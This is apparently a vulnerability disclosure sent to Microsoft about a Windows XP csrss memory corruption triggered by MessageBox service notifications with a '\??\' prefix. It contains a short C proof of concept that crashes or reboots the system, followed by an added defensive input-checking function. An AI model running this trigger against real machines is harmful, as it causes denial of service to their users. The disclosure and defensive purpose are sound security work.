Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Description

Dear Secure@microsoft.com,

On one of the Russian forums a security vulnerability in Microsoft Windows is discussed (Windows XP is tested). The vulnerability is caused by memory corruption if a string beginning with "\?\" is sent through the MessageBox API with the MB_SERVICE_NOTIFICATION flag. It looks like some "debug" feature not cleaned out in the final release, and it seems to be exploitable to code execution at kernel level.

Code example below:

    #include <stdio.h>
    #include <windows.h>

    int main(void){
        int i;
        /* text and caption both begin with the \??\ prefix */
        char bug1[] = "\\??\\XXXX";

        for(i = 0; i < 10; i++) {
            MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
        }
    }

System hangs, crashes (BSOD) or reboots.

--
http://www.security.nnov.ru

             /\_/\
            { , . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
    +-------------o66o--+ /
                        |/
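A defensive check for the condition reported above, added here as an example and not taken from the report or from Microsoft: a service that shows untrusted text (for instance an NT-style path) in a service notification can make sure the string never begins with the prefix. The function and macro names are hypothetical, the flag value mirrors MB_SERVICE_NOTIFICATION in winuser.h, and the approach assumes, as the report states, that the trigger is a string beginning with the prefix.

```c
#include <stdio.h>
#include <string.h>

/* Same value as MB_SERVICE_NOTIFICATION in winuser.h, redefined so the
   check builds without windows.h (hypothetical name). */
#define GUARD_MB_SERVICE_NOTIFICATION 0x00200000UL

/* 1 if s starts with the prefix used in the report's code ("\??\") or
   the form quoted in its prose ("\?\"). */
static int has_risky_prefix(const char *s) {
    static const char *const prefixes[] = { "\\??\\", "\\?\\" };
    size_t i;
    if (s == NULL) return 0;
    for (i = 0; i < sizeof prefixes / sizeof prefixes[0]; i++)
        if (strncmp(s, prefixes[i], strlen(prefixes[i])) == 0) return 1;
    return 0;
}

/* Copy src into dst. When flags request a service notification and src
   has a risky prefix, put one space in front so the string no longer
   begins with it (assumption: the leading prefix is the trigger).
   Returns 1 if rewritten, 0 if copied as-is, -1 if an argument is
   missing or dst is too small (the caller should then not display it). */
int guard_notification_text(unsigned long flags, const char *src,
                            char *dst, size_t dst_len) {
    int risky;
    size_t need;
    if (src == NULL || dst == NULL || dst_len == 0) return -1;
    risky = (flags & GUARD_MB_SERVICE_NOTIFICATION) && has_risky_prefix(src);
    need = strlen(src) + (risky ? 1 : 0) + 1;   /* padding + NUL */
    if (need > dst_len) { dst[0] = '\0'; return -1; }
    if (risky) *dst++ = ' ';
    strcpy(dst, src);
    return risky;
}

int main(void) {
    /* Constructed sample: an NT-style path a service might display. */
    char out[64];
    int rc = guard_notification_text(GUARD_MB_SERVICE_NOTIFICATION,
                                     "\\??\\C:\\logs\\app.log", out, sizeof out);
    printf("rc=%d text=\"%s\"\n", rc, out);
    return 0;
}
```

This only keeps a program's own notifications from meeting the reported condition when the text comes from untrusted input; it does not prevent another local process from calling the API directly.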